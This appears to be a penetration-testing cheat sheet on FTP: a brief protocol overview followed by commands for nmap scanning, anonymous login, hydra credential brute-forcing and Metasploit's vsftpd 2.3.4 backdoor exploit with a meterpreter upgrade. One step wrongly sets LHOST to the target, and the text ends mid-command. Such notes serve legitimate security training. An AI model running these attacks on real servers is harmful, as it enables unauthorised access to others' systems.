FTP

FTP (File Transfer Protocol) is a network protocol that allows files to be shared between a server and a client. It operates on TCP port 21 and is commonly used to transfer files to and from web servers.

To access an FTP server, a username and password are usually required. However, some FTP servers allow anonymous access, meaning anyone can connect without providing login credentials.

Since FTP uses password-based authentication, attackers can try brute-force attacks to guess valid login credentials. If an FTP server is misconfigured with weak security, it can become an easy target for unauthorized access.

Techniques

nmap -sV [TARGET IP]

ftp [TARGET IP]
> anonymous

# Bruteforce
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt [TARGET IP] -t 4 ftp

# using ftp
get [FILE]

Exploitation

vsftpd is an FTP server for Linux and other Unix-based systems. It is the default FTP server for Ubuntu, CentOS, and Fedora.

vsftpd v2.3.4 has a command execution vulnerability caused by a backdoor secretly added to its download archive through a supply chain attack. This backdoor allows attackers to execute commands on the affected system, posing a serious security risk.

nmap -sS -sV -O [TARGET]

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
exploit

search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter

show options
set LHOST [TARGET]
set SESSION